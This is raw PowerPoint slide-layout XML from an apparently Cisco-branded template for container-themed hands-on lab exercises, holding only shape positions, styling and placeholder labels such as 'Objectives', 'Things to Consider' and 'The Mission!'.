                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4713D7A6-8EA3-4D43-A84B-0D40DD7ED047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1883080"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caveats, reminders, things to note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A3B4B5F1-DDF5-904C-B731-F491D98C1483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1432782"/>
            <a:ext cx="1462260" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF4FE45A-5E5A-B344-B80B-522FEE2CC166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1435483"/>
            <a:ext cx="2475358" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Things to Consider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199910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Mission">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="637382"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNE Lab Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591D7585-EC32-AF4B-AC6D-18D793602D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1888761"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objectives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59F7CAC2-E697-0447-A314-412B22FAD525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362607" y="315630"/>
            <a:ext cx="1529586" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BB0379-7718-0448-AE43-29AB7AF168A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5880510" y="341136"/>
            <a:ext cx="2902744" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="142872" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="261931" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="333367" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="404802" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Estimated Time: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4713D7A6-8EA3-4D43-A84B-0D40DD7ED047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1883080"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caveats, reminders, things to note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14B64618-BCE9-A94F-B91D-F217B1F81910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1432782"/>
            <a:ext cx="1462260" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6D4A86-0A38-3B40-8098-304C87AD2557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1435483"/>
            <a:ext cx="2475358" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Things to Consider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404742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127811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lumMod val="75000"/>
                  </a:schemeClr>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148313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Segue_White">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199378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DCI Mission Break">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618CC10-7F93-7A41-8993-E9C1B07FFE6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63057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B2E071-87AA-2944-BFC9-B34F7C96CED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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exercise …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58C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56114" y="1597039"/>
            <a:ext cx="4073237" cy="2703601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F92A122-F59E-2149-A6EC-A06ADF0658CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ECB6CF1-430E-B94D-893E-83FAC898546B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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52730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CI Mission Break">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618CC10-7F93-7A41-8993-E9C1B07FFE6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63057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEE6027-B3CE-2649-BB30-A6CB8DFB6CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="1269578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get your hands dirty with …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE8B9CC-DA30-724D-88D8-CB0C12E21A5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1297007"/>
            <a:ext cx="2409443" cy="2531836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B2E071-87AA-2944-BFC9-B34F7C96CED5}"/>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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475DBA01-A720-5249-92E7-6CD20F43871E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BFE694-CB85-C949-90B8-23D1502D0A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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9480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DNA Mission Brea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A6F419-F710-FA43-8CAB-B4E1F64DE05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B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exercise …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58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56114" y="1597039"/>
            <a:ext cx="4073237" cy="2703601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCF34CE-2DE1-FF41-896D-B3AE883AA20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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A736EB88-8AEA-FD4A-B99F-FBF9132B9E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90EB5A3-2F34-6549-82A8-0A0C2F4EC495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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12642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NA Mission Brea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A6F419-F710-FA43-8CAB-B4E1F64DE05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B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="1269578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get your hands dirty with …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58C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1297007"/>
